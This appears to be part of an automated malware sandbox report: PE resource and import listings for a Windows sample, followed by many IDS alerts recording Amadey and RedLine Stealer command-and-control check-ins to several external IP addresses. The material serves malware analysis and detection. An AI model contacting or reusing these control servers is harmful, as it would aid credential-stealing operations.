                                                                                                                                                                                    RT_ICON0x281e2600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28208080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28218b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2821d680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28224300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28249d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2824e700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2825d180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28265c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2826b280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28290d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282a1780x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282ab000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282afd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282be780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282c7200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282cde80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282d3500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x282f8f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28309a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2830e700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2831d180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28325c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2832c880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28331f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28357980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28368400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28371c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28376a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28385500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2838df80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28393600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283b9080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283c9b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283d3380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283d8080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283e6b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283ef580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283f6200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x283fb880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28421300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x28431d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_ICON0x2843b600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                                                                                                                                                    RT_STRING0x28442a80x3a8dataSlovakSlovakia
                                                                                                                                                                                    RT_STRING0x28446500x362dataSlovakSlovakia
                                                                                                                                                                                    RT_ACCELERATOR0x28440400x78dataSlovakSlovakia
                                                                                                                                                                                    RT_GROUP_ICON0x283d7a00x68dataSlovakSlovakia
                                                                                                                                                                                    RT_GROUP_ICON0x2821d180x4cdataSlovakSlovakia
                                                                                                                                                                                    RT_GROUP_ICON0x2830e080x68dataSlovakSlovakia
                                                                                                                                                                                    RT_GROUP_ICON0x2824e400x30dataSlovakSlovakia
                                                                                                                                                                                    RT_GROUP_ICON0x282af680x68dataSlovakSlovakia
                                                                                                                                                                                    RT_GROUP_ICON0x28376300x76dataSlovakSlovakia
                                                                                                                                                                                    RT_GROUP_ICON0x2843fc80x76dataSlovakSlovakia
                                                                                                                                                                                    RT_VERSION0x28440b80x1f0MS Windows COFF PowerPC object fileSlovakSlovakia
                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    KERNEL32.dllZombifyActCtx, GetSystemWindowsDirectoryW, GetComputerNameW, SetEvent, FreeEnvironmentStringsA, GetModuleHandleW, GetTickCount, GetCurrentThread, ReadConsoleW, GetVolumePathNameW, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetFileAttributesW, MulDiv, WriteConsoleW, InterlockedExchange, GetCPInfoExW, SetLastError, TlsGetValue, VirtualAlloc, SetComputerNameA, LoadLibraryA, OpenMutexA, WriteConsoleA, GetProcessWorkingSetSize, SetCommMask, FindFirstChangeNotificationA, GetFileAttributesExW, EndUpdateResourceA, GlobalAddAtomW, DebugBreak, FindActCtxSectionStringW, OpenFileMappingA, GetConsoleSelectionInfo, LCMapStringW, FindFirstChangeNotificationW, RemoveVectoredExceptionHandler, SetCriticalSectionSpinCount, GetProcAddress, GetEnvironmentVariableW, MultiByteToWideChar, UnhandledExceptionFilter, SetUnhandledExceptionFilter, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, WriteFile, GetStdHandle, GetModuleFileNameA, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, VirtualFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, HeapReAlloc, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, HeapSize, RtlUnwind, RaiseException, SetStdHandle, GetConsoleOutputCP, CreateFileA, CloseHandle, FlushFileBuffers
                                                                                                                                                                                    ADVAPI32.dllBackupEventLogW, IsTokenUntrusted, RegQueryInfoKeyA, CloseEventLog
                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                    SlovakSlovakia
                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                    192.168.2.462.204.41.10950470802027700 01/05/23-09:00:34.032606TCP2027700ET TROJAN Amadey CnC Check-In5047080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950700802027700 01/05/23-09:00:56.499134TCP2027700ET TROJAN Amadey CnC Check-In5070080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949946802027700 01/05/23-08:59:21.997477TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349904802027700 01/05/23-08:59:12.809770TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950246802027700 01/05/23-09:00:05.577202TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350679802027700 01/05/23-09:00:54.414273TCP2027700ET TROJAN Amadey CnC Check-In5067980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350327802027700 01/05/23-09:00:15.880549TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350618802027700 01/05/23-09:00:46.603128TCP2027700ET TROJAN Amadey CnC Check-In5061880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350814802027700 01/05/23-09:01:06.461908TCP2027700ET TROJAN Amadey CnC Check-In5081480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950397802027700 01/05/23-09:00:23.771644TCP2027700ET TROJAN Amadey CnC Check-In5039780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350545802027700 01/05/23-09:00:40.513730TCP2027700ET TROJAN Amadey CnC Check-In5054580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950241802027700 01/05/23-09:00:05.051153TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949778802027700 01/05/23-08:58:47.873482TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350383802027700 01/05/23-09:00:22.389862TCP2027700ET TROJAN Amadey CnC Check-In5038380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349960802027700 01/05/23-08:59:25.113378TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350450802027700 01/05/23-09:00:29.302149TCP2027700ET TROJAN Amadey CnC Check-In5045080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350708802027700 01/05/23-09:00:57.245734TCP2027700ET TROJAN Amadey CnC Check-In5070880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950123802027700 01/05/23-08:59:52.426983TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350400802027700 01/05/23-09:00:23.939977TCP2027700ET TROJAN Amadey CnC Check-In5040080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350613802027700 01/05/23-09:00:46.098638TCP2027700ET TROJAN Amadey CnC Check-In5061380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949979802027700 01/05/23-08:59:28.724139TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350092802027700 01/05/23-08:59:49.055684TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350417802027700 01/05/23-09:00:25.494101TCP2027700ET TROJAN Amadey CnC Check-In5041780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.482.115.223.1550575154862850027 01/05/23-09:00:44.625462TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init5057515486192.168.2.482.115.223.15
                                                                                                                                                                                    192.168.2.445.66.230.12349965802027700 01/05/23-08:59:25.927605TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950414802027700 01/05/23-09:00:25.340531TCP2027700ET TROJAN Amadey CnC Check-In5041480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950012802027700 01/05/23-08:59:33.619724TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950509802027700 01/05/23-09:00:37.152244TCP2027700ET TROJAN Amadey CnC Check-In5050980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350298802027700 01/05/23-09:00:10.484724TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349887802027700 01/05/23-08:59:10.854546TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950017802027700 01/05/23-08:59:34.602269TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949828802027700 01/05/23-08:58:57.542304TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350630802027700 01/05/23-09:00:47.970193TCP2027700ET TROJAN Amadey CnC Check-In5063080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350142802027700 01/05/23-08:59:54.079286TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950799802027700 01/05/23-09:01:05.218226TCP2027700ET TROJAN Amadey CnC Check-In5079980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950447802027700 01/05/23-09:00:28.567777TCP2027700ET TROJAN Amadey CnC Check-In5044780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950738802027700 01/05/23-09:01:00.070658TCP2027700ET TROJAN Amadey CnC Check-In5073880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350455802027700 01/05/23-09:00:29.836120TCP2027700ET TROJAN Amadey CnC Check-In5045580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950683802027700 01/05/23-09:00:54.918761TCP2027700ET TROJAN Amadey CnC Check-In5068380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950331802027700 01/05/23-09:00:16.345302TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350287802027700 01/05/23-09:00:09.524033TCP2027700ET TROJAN Amadey CnC Check-In5028780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350405802027700 01/05/23-09:00:24.377125TCP2027700ET TROJAN Amadey CnC Check-In5040580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349842802027700 01/05/23-08:59:03.418785TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949773802027700 01/05/23-08:58:45.937667TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950184802027700 01/05/23-08:59:59.403497TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950650802027700 01/05/23-09:00:52.395738TCP2027700ET TROJAN Amadey CnC Check-In5065080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350718802027700 01/05/23-09:00:58.061459TCP2027700ET TROJAN Amadey CnC Check-In5071880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949740802027700 01/05/23-08:58:29.781479TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350031802027700 01/05/23-08:59:40.782287TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949901802027700 01/05/23-08:59:12.535136TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350393802027700 01/05/23-09:00:23.404702TCP2027700ET TROJAN Amadey CnC Check-In5039380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.482.115.223.1550575154862850286 01/05/23-09:01:17.056801TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity5057515486192.168.2.482.115.223.15
                                                                                                                                                                                    192.168.2.445.32.200.11350557802027700 01/05/23-09:00:41.555872TCP2027700ET TROJAN Amadey CnC Check-In5055780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350635802027700 01/05/23-09:00:48.498508TCP2027700ET TROJAN Amadey CnC Check-In5063580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350277802027700 01/05/23-09:00:08.495677TCP2027700ET TROJAN Amadey CnC Check-In5027780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350752802027700 01/05/23-09:01:01.248601TCP2027700ET TROJAN Amadey CnC Check-In5075280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350568802027700 01/05/23-09:00:42.097830TCP2027700ET TROJAN Amadey CnC Check-In5056880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950766802027700 01/05/23-09:01:02.615563TCP2027700ET TROJAN Amadey CnC Check-In5076680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350233802027700 01/05/23-09:00:04.345204TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950553802027700 01/05/23-09:00:40.950059TCP2027700ET TROJAN Amadey CnC Check-In5055380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350729802027700 01/05/23-09:00:59.234035TCP2027700ET TROJAN Amadey CnC Check-In5072980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350355802027700 01/05/23-09:00:19.100238TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350272802027700 01/05/23-09:00:08.028845TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350563802027700 01/05/23-09:00:41.874777TCP2027700ET TROJAN Amadey CnC Check-In5056380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350211802027700 01/05/23-09:00:02.122665TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350367802027700 01/05/23-09:00:20.661129TCP2027700ET TROJAN Amadey CnC Check-In5036780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949863802027700 01/05/23-08:59:07.164841TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350065802027700 01/05/23-08:59:46.088129TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350052802027700 01/05/23-08:59:43.585697TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950253802027700 01/05/23-09:00:06.154236TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950721802027700 01/05/23-09:00:58.550789TCP2027700ET TROJAN Amadey CnC Check-In5072180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350535802027700 01/05/23-09:00:39.324967TCP2027700ET TROJAN Amadey CnC Check-In5053580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350619802027700 01/05/23-09:00:46.879341TCP2027700ET TROJAN Amadey CnC Check-In5061980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350395802027700 01/05/23-09:00:23.481753TCP2027700ET TROJAN Amadey CnC Check-In5039580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350815802027700 01/05/23-09:01:06.752289TCP2027700ET TROJAN Amadey CnC Check-In5081580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950454802027700 01/05/23-09:00:29.567529TCP2027700ET TROJAN Amadey CnC Check-In5045480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350266802027700 01/05/23-09:00:07.574734TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950094802027700 01/05/23-08:59:49.425215TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350138802027700 01/05/23-08:59:53.884041TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950622802027700 01/05/23-09:00:47.066181TCP2027700ET TROJAN Amadey CnC Check-In5062280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950295802027700 01/05/23-09:00:10.323715TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350625802027700 01/05/23-09:00:47.337209TCP2027700ET TROJAN Amadey CnC Check-In5062580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350690802027700 01/05/23-09:00:55.668022TCP2027700ET TROJAN Amadey CnC Check-In5069080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350247802027700 01/05/23-09:00:05.746777TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950639802027700 01/05/23-09:00:48.724908TCP2027700ET TROJAN Amadey CnC Check-In5063980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350494802027700 01/05/23-09:00:35.553568TCP2027700ET TROJAN Amadey CnC Check-In5049480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350691802027700 01/05/23-09:00:55.942061TCP2027700ET TROJAN Amadey CnC Check-In5069180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950438802027700 01/05/23-09:00:27.630649TCP2027700ET TROJAN Amadey CnC Check-In5043880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350681802027700 01/05/23-09:00:54.647884TCP2027700ET TROJAN Amadey CnC Check-In5068180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950692802027700 01/05/23-09:00:55.836474TCP2027700ET TROJAN Amadey CnC Check-In5069280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950168802027700 01/05/23-08:59:58.037942TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350209802027700 01/05/23-09:00:01.920404TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350745802027700 01/05/23-09:01:00.501319TCP2027700ET TROJAN Amadey CnC Check-In5074580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350415802027700 01/05/23-09:00:25.451863TCP2027700ET TROJAN Amadey CnC Check-In5041580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350110802027700 01/05/23-08:59:51.025266TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950324802027700 01/05/23-09:00:13.873305TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950380802027700 01/05/23-09:00:22.279876TCP2027700ET TROJAN Amadey CnC Check-In5038080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350758802027700 01/05/23-09:01:02.001255TCP2027700ET TROJAN Amadey CnC Check-In5075880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949835802027700 01/05/23-08:59:00.200398TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349986802027700 01/05/23-08:59:29.463092TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350265802027700 01/05/23-09:00:07.405430TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350672802027700 01/05/23-09:00:53.850929TCP2027700ET TROJAN Amadey CnC Check-In5067280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949752802027700 01/05/23-08:58:37.213644TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949780802027700 01/05/23-08:58:48.899837TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350634802027700 01/05/23-09:00:48.211624TCP2027700ET TROJAN Amadey CnC Check-In5063480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350764802027700 01/05/23-09:01:02.361496TCP2027700ET TROJAN Amadey CnC Check-In5076480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950085802027700 01/05/23-08:59:48.417766TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350284802027700 01/05/23-09:00:09.116701TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350154802027700 01/05/23-08:59:55.353881TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950435802027700 01/05/23-09:00:27.331565TCP2027700ET TROJAN Amadey CnC Check-In5043580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950352802027700 01/05/23-09:00:18.853923TCP2027700ET TROJAN Amadey CnC Check-In5035280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350717802027700 01/05/23-09:00:57.953893TCP2027700ET TROJAN Amadey CnC Check-In5071780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950695802027700 01/05/23-09:00:56.139451TCP2027700ET TROJAN Amadey CnC Check-In5069580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950026802027700 01/05/23-08:59:36.189241TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950378802027700 01/05/23-09:00:22.015733TCP2027700ET TROJAN Amadey CnC Check-In5037880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949759802027700 01/05/23-08:58:38.842133TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950283802027700 01/05/23-09:00:09.140730TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950087802027700 01/05/23-08:59:48.754488TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350107802027700 01/05/23-08:59:50.632374TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950461802027700 01/05/23-09:00:30.444227TCP2027700ET TROJAN Amadey CnC Check-In5046180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350677802027700 01/05/23-09:00:54.350828TCP2027700ET TROJAN Amadey CnC Check-In5067780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949998802027700 01/05/23-08:59:31.372183TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.462.204.41.109
